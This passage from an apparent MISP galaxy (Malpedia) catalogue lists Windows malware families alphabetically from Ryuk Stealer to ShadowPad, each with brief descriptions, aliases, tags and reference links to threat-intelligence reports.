https://thedfirreport.com/2020/10/08/ryuks-return/
https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/
https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html
https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/
https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/
https://www.youtube.com/watch?v=Of_KjNG9DHc
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/
https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf
https://twitter.com/IntelAdvanced/status/1356114606780002308
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects
https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html
https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html
https://www.youtube.com/watch?v=7xxRunBP5XA
https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://twitter.com/anthomsec/status/1321865315513520128
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Ryuk Stealer

Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.

The tag is: misp-galaxy:malpedia="Ryuk Stealer"

Ryuk Stealer is also known as:

Sidoh

Table 2558. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer
https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/
https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf
https://twitter.com/VK_Intel/status/1171782155581689858
https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/

Sadogo

Ransomware.

The tag is: misp-galaxy:malpedia="Sadogo"

Sadogo is also known as:

Table 2559. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo
https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html

Saefko

The tag is: misp-galaxy:malpedia="Saefko"

Saefko is also known as:

Table 2560. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko
https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat

SafeNet

The tag is: misp-galaxy:malpedia="SafeNet"

SafeNet is also known as:

Table 2561. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf

SAGE

The tag is: misp-galaxy:malpedia="SAGE"

SAGE is also known as:

Saga

Table 2562. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom
https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/
http://malware-traffic-analysis.net/2017/10/13/index.html
https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga
https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/
https://www.cert.pl/en/news/single/sage-2-0-analysis/

SaiGon

FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.

The tag is: misp-galaxy:malpedia="SaiGon"

SaiGon is also known as:

Table 2563. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon
https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

Saint Bot

The tag is: misp-galaxy:malpedia="Saint Bot"

Saint Bot is also known as:

Table 2564. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot
https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/

Sakula RAT

Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.

The tag is: misp-galaxy:malpedia="Sakula RAT"

Sakula RAT is also known as:

Sakurel

Table 2565. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat
https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf
https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula
https://www.secureworks.com/research/sakula-malware-family
https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1
https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99

Salgorea

The tag is: misp-galaxy:malpedia="Salgorea"

Salgorea is also known as:

BadCake

Table 2566. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea
https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf
https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/
https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware

Sality

The tag is: misp-galaxy:malpedia="Sality"

Sality is also known as:

Table 2567. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf
https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail
https://unit42.paloaltonetworks.com/c2-traffic/
https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf
https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py

SamoRAT

The tag is: misp-galaxy:malpedia="SamoRAT"

SamoRAT is also known as:

Table 2568. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat
https://business.xunison.com/analysis-of-samorat/

SamSam

The tag is: misp-galaxy:malpedia="SamSam"

SamSam is also known as:

Samas

Table 2569. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam
https://www.secureworks.com/research/threat-profiles/gold-lowell
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
http://blog.talosintel.com/2016/03/samsam-ransomware.html
https://sites.temple.edu/care/ci-rw-attacks/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/
https://www.secureworks.com/research/samsam-ransomware-campaigns
https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public
https://www.secureworks.com/blog/ransomware-deployed-by-adversary
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx
https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit
https://www.secureworks.com/blog/samas-ransomware
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

Sanny

The tag is: misp-galaxy:malpedia="Sanny"

Sanny is also known as:

Table 2570. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny
https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html

SappyCache

The tag is: misp-galaxy:malpedia="SappyCache"

SappyCache is also known as:

Table 2571. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache
https://blog.alyac.co.kr/m/2219
https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails
https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html
https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf
https://blog.alyac.co.kr/2219

Sarhust

The tag is: misp-galaxy:malpedia="Sarhust"

Sarhust is also known as:

ENDCMD
Hussarini

Table 2572. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust
https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a
https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html

Sasfis

Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.

The tag is: misp-galaxy:malpedia="Sasfis"

Sasfis is also known as:

Oficla

Table 2573. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis
https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/
https://www.symantec.com/security-center/writeup/2010-020210-5440-99
https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/
https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj_{Sasfis-O/detailed-analysis.aspx[https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj}Sasfis-O/detailed-analysis.aspx]
https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign

Satan

Ransomware.

The tag is: misp-galaxy:malpedia="Satan"

Satan is also known as:

5ss5c
DBGer
Lucky Ransomware

Table 2574. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.satan
https://www.sangfor.com/source/blog-network-security/1094.html
https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html
https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2
https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread
https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html
https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/
http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/
https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/

Satana

The tag is: misp-galaxy:malpedia="Satana"

Satana is also known as:

Table 2575. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.satana
https://blog.reversinglabs.com/blog/retread-ransomware
https://www.cylance.com/threat-spotlight-satan-raas

Satellite Turla

The tag is: misp-galaxy:malpedia="Satellite Turla"

Satellite Turla is also known as:

Table 2576. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla
https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/

Sathurbot

The tag is: misp-galaxy:malpedia="Sathurbot"

Sathurbot is also known as:

Table 2577. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/

ScanPOS

The tag is: misp-galaxy:malpedia="ScanPOS"

ScanPOS is also known as:

Table 2578. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos
https://securitykitten.github.io/2016/11/15/scanpos.html
https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware

Scarabey

Ransomware with ransomnote in Russian and encryption extension .scarab.

The tag is: misp-galaxy:malpedia="Scarabey"

Scarabey is also known as:

MVP
Scarab
Scarab-Russian

Table 2579. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey
https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html

Scarab Ransomware

The tag is: misp-galaxy:malpedia="Scarab Ransomware"

Scarab Ransomware is also known as:

Table 2580. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom
https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
http://malware-traffic-analysis.net/2017/11/23/index.html

Schneiken

Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.

The tag is: misp-galaxy:malpedia="Schneiken"

Schneiken is also known as:

Table 2581. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken
https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb
https://github.com/vithakur/schneiken

Scote

The tag is: misp-galaxy:malpedia="Scote"

Scote is also known as:

Table 2582. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.scote
https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/

Scranos

The tag is: misp-galaxy:malpedia="Scranos"

Scranos is also known as:

Table 2583. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos
https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf
https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/

ScreenLocker

The tag is: misp-galaxy:malpedia="ScreenLocker"

ScreenLocker is also known as:

Table 2584. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker
https://twitter.com/struppigel/status/791535679905927168

SDBbot

The tag is: misp-galaxy:malpedia="SDBbot"

SDBbot is also known as:

Table 2585. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot
https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104
https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://github.com/Tera0017/SDBbot-Unpacker
https://vblocalhost.com/uploads/VB2020-Jung.pdf
https://www.secureworks.com/research/threat-profiles/gold-tahoe

SEADADDY

The tag is: misp-galaxy:malpedia="SEADADDY"

SEADADDY is also known as:

SeaDuke
Seadask

Table 2586. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/
https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html

SeaSalt

The tag is: misp-galaxy:malpedia="SeaSalt"

SeaSalt is also known as:

Table 2587. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

SectopRAT

The tag is: misp-galaxy:malpedia="SectopRAT"

SectopRAT is also known as:

1xxbot
ArechClient

Table 2588. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat
https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers
https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html

SeDll

The tag is: misp-galaxy:malpedia="SeDll"

SeDll is also known as:

Table 2589. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/
https://www.secureworks.com/research/threat-profiles/bronze-mohawk

Sedreco

The tag is: misp-galaxy:malpedia="Sedreco"

Sedreco is also known as:

azzy
eviltoss

Table 2590. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf
http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html
http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/

Seduploader

The tag is: misp-galaxy:malpedia="Seduploader"

Seduploader is also known as:

carberplike
downrage
jhuhugit
jkeyskw

Table 2591. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government
https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/
https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html
https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf
http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://www.secureworks.com/research/threat-profiles/iron-twilight
http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/
https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/
https://blog.xpnsec.com/apt28-hospitality-malware-part-2/
https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed

seinup

The tag is: misp-galaxy:malpedia="seinup"

seinup is also known as:

Table 2592. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup
https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html

Sekhmet

Ransomware.

The tag is: misp-galaxy:malpedia="Sekhmet"

Sekhmet is also known as:

Table 2593. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet
https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

SendSafe

The tag is: misp-galaxy:malpedia="SendSafe"

SendSafe is also known as:

Table 2594. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe
https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf
https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

SepSys

Ransomware.

The tag is: misp-galaxy:malpedia="SepSys"

SepSys is also known as:

Silvertor Ransomware

Table 2595. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys
https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html

Sepulcher

The tag is: misp-galaxy:malpedia="Sepulcher"

Sepulcher is also known as:

Table 2596. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher
https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic
https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global

Serpico

The tag is: misp-galaxy:malpedia="Serpico"

Serpico is also known as:

Table 2597. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico

ServHelper

ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.

ProofPoint noticed two distinct variant - "tunnel" and "downloader" (citation): "The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader."

The tag is: misp-galaxy:malpedia="ServHelper"

ServHelper is also known as:

Table 2598. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper
https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html
https://insights.oem.avira.com/ta505-apt-group-targets-americas/
https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/
https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf
https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/
https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware
https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/
https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/
https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/
https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.secureworks.com/research/threat-profiles/gold-tahoe

shadowhammer

The tag is: misp-galaxy:malpedia="shadowhammer"

shadowhammer is also known as:

DAYJOB

Table 2599. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer
https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html
https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/
https://mauronz.github.io/shadowhammer-backdoor
https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://securelist.com/apt-trends-report-q2-2020/97937/
https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/
https://www.youtube.com/watch?v=T5wPwvLrBYU
https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows
https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/
https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf
https://norfolkinfosec.com/the-first-stage-of-shadowhammer/
https://blog.reversinglabs.com/blog/forging-the-shadowhammer
https://securelist.com/operation-shadowhammer/89992/
https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/

ShadowPad

The tag is: misp-galaxy:malpedia="ShadowPad"

ShadowPad is also known as:

POISONPLUG.SHADOW
XShellGhost

Table 2600. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad
https://www.youtube.com/watch?v=_fstHQSK-kk
https://therecord.media/redecho-group-parks-domains-after-public-exposure/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/
https://www.recordedfuture.com/redecho-targeting-indian-power-sector/
https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf
https://www.youtube.com/watch?v=55kaaMGBARM
https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf
https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/
https://securelist.com/shadowpad-in-corporate-networks/81432/
https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf
https://securelist.com/apt-trends-report-q2-2020/97937/
